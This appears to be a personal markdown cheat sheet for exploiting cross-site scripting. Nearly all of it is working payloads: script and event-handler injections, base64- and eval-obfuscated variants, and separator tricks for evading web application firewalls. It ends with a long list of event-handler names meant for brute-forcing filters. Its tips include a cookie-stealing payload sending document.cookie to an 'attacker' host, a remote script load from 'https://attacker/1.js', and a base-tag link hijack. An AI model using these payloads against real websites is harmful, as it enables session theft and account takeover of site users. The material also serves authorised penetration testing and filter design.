mastering xss

xss.md

exploiting xss

what can you inject in the affected point?

1. html tags

• 1.1. Easiest case
• 1.2. Try to create a script tag

2. attributes with event handler value (onload, onerror, ...)

• 2.1. There are some examples here and more here
• 2.2. You can try a brute force using this list
• 2.3. Base64: You can replace alert(1) with location=window.atob`amF2YXNjcmlwdDphbGVydCgxKQoK`

3. attributes with URL value (src, href, ...)

• 3.1. Some pairs are: embed/src, iframe/src, object/data, a/href, button/formaction, form/action
• 3.2. A complete list of pairs is available here (look for attributes with the type %URI)
• 3.2. Base64: You can replace javascript:alert(1) with data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

bypassing wafs

• For other ideas: https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
• some characters to separate attributes are: %09 %0a %0c %0d %20 %2f

removing space

• use a separator character

<imgonerror='alert(1)'src
<iframe/src=javascript:alert(1)

avoiding characters

• html encode inside attribute values
• eval
• base64
• use grave accent (remove parentheses)

<img/src/onerror=alert`1`
<img onerror=alert&#040cookie&#041 src
<img onerror=eval.call`${`alert\x281\u0029`}` src>
<svg onload=location=window.atob`amF2YXNjcmlwdDphbGVydCgxMTEp`>
<svg/onload=body.appendChild(document.createElement`script`).src='https://attacker/1.js'>
<xss style="opacity:0;position:fixed;font-size:999px;top:0;left:0;" onpointerover="alert(1)">test</xss>
 
<embed src=javascript:location=window.atob`amF2YXNjcmlwdDphbGVydCgxMTEp`>
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==


<script>location=window.atob`amF2YXNjcmlwdDphbGVydCgxMTEp`</script>
<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>
<script>eval.call`${'alert\x28document.cookie\x29'}`</script>
<script>x=new DOMMatrix;matrix=alert;x.a=1;location='javascript'+':'+x</script>

adding extra code

• put < > " with a separator character inside the tag

<svg </onload=alert(1)"

event handlers

<!-- onerror -->       <img onerror=alert(1) src
<!-- onfocus -->       <input/autofocus/onfocus=alert(1)> 
<!-- onload -->        <svg onload=alert(1)>
<!-- onloadstart -->   <audio/src/onloadstart=alert(42)>
<!-- onmouseover -->   <newtag style=font-size:900px onmouseover=alert(1)>explosion
<!-- onpointerover --> <xsstag style=font-size:900px onpointerover=alert(1)>explosion
 

tips

• reflected to dom-based eval(location.hash.slice(1))

• steal cookie <img src onerror=src='http://attacker/'+cookie>

• change page relative links <base href="http://attacker/">

• bypass filter js keywords, change to []()!+: http://www.jsfuck.com/

references

• https://html.spec.whatwg.org/multipage/indices.html
• https://html.spec.whatwg.org/multipage/webappapis.html#event-handlers-on-elements,-document-objects,-and-window-objects
• https://www.w3.org/TR/2017/REC-html52-20171214/fullindex.html#attributes-table
• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
• WAHH, Chapter 12.
• https://github.com/s0md3v/AwesomeXSS
• https://rootsector.blogspot.com/2018/05/cross-site-scripting-xss.html
• https://portswigger.net/research/javascript-without-parentheses-using-dommatrix
• https://html5sec.org/
• https://labs.f-secure.com/blog/getting-real-with-xss/

TODO

• dom based
• https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

onactivate
onafterprint
onafterscriptexecute
onanimationcancel
onanimationend
onanimationiteration
onanimationstart
onauxclick
onbeforeactivate
onbeforecopy
onbeforecut
onbeforedeactivate
onbeforepaste
onbeforeprint
onbeforescriptexecute
onbeforeunload
onbegin
onblur
onbounce
oncanplay
oncanplaythrough
onchange
onclick
onclose
oncontextmenu
oncopy
oncut
ondblclick
ondeactivate
ondrag
ondragend
ondragenter
ondragleave
ondragover
ondragstart
ondrop
onend
onended
onerror
onfinish
onfocus
onfocusin
onfocusout
onfullscreenchange
onhashchange
oninput
oninvalid
onkeydown
onkeypress
onkeyup
onload
onloadeddata
onloadedmetadata
onloadend
onloadstart
onmessage
onmousedown
onmouseenter
onmouseleave
onmousemove
onmouseout
onmouseover
onmouseup
onmozfullscreenchange
onpageshow
onpaste
onpause
onplay
onplaying
onpointerdown
onpointerenter
onpointerleave
onpointermove
onpointerout
onpointerover
onpointerrawupdate
onpointerup
onpopstate
onreadystatechange
onrepeat
onreset
onresize
onscroll
onsearch
onseeked
onseeking
onselect
onstart
onsubmit
ontimeupdate
ontoggle
ontouchend
ontouchmove
ontouchstart
ontransitioncancel
ontransitionend
ontransitionrun
onunhandledrejection
onunload
onvolumechange
onwaiting
onwebkitanimationend
onwebkitanimationstart
onwebkittransitionend
onwheel